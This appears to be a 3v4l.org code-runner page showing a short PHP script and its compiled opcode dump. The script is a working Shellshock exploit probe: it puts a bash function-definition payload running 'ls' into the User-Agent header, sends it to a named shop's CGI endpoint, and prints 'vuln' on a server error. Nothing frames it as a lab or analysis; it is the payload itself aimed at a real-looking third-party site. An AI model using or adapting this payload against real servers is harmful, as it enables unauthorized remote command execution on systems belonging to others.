3v4l.org

run code in 300+ PHP versions simultaneously
<?php $url = "http://www.tu-shop.de/cgi-bin/cosmoshop/lshop.cgi"; $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) ); if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) echo "vuln";
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 18, Position 2 = 25
Branch analysis from position: 18
2 jumps found. (Code = 43) Position 1 = 26, Position 2 = 27
Branch analysis from position: 26
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 27
Branch analysis from position: 25
filename:       /in/acONZ
function name:  (null)
number of ops:  28
compiled vars:  !0 = $url, !1 = $cmd, !2 = $context, !3 = $http_response_header
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fwww.tu-shop.de%2Fcgi-bin%2Fcosmoshop%2Flshop.cgi'
    3     1        ASSIGN                                                   !1, 'ls'
    4     2        INIT_FCALL                                               'stream_context_create'
    7     3        INIT_ARRAY                                       ~6      'GET', 'method'
    8     4        CONCAT                                           ~7      'User-Agent%3A+%28%29+%7B+%3A%3B%7D%3B+%2Fbin%2Fbash+-c+%22', !1
          5        CONCAT                                           ~8      ~7, '%22'
          6        ADD_ARRAY_ELEMENT                                ~6      ~8, 'header'
          7        INIT_ARRAY                                       ~9      ~6, 'http'
          8        SEND_VAL                                                 ~9
          9        DO_ICALL                                         $10     
    4    10        ASSIGN                                                   !2, $10
   13    11        INIT_FCALL                                               'file_get_contents'
         12        SEND_VAR                                                 !0
         13        SEND_VAL                                                 <false>
         14        SEND_VAR                                                 !2
         15        DO_ICALL                                         $12     
         16        BOOL_NOT                                         ~13     $12
         17      > JMPZ_EX                                          ~13     ~13, ->25
         18    >   INIT_FCALL                                               'strpos'
         19        FETCH_DIM_R                                      ~14     !3, 0
         20        SEND_VAL                                                 ~14
         21        SEND_VAL                                                 '500'
         22        DO_ICALL                                         $15     
         23        IS_SMALLER                                       ~16     0, $15
         24        BOOL                                             ~13     ~16
         25    > > JMPZ                                                     ~13, ->27
   14    26    >   ECHO                                                     'vuln'
         27    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
164.8 ms | 1388 KiB | 19 Q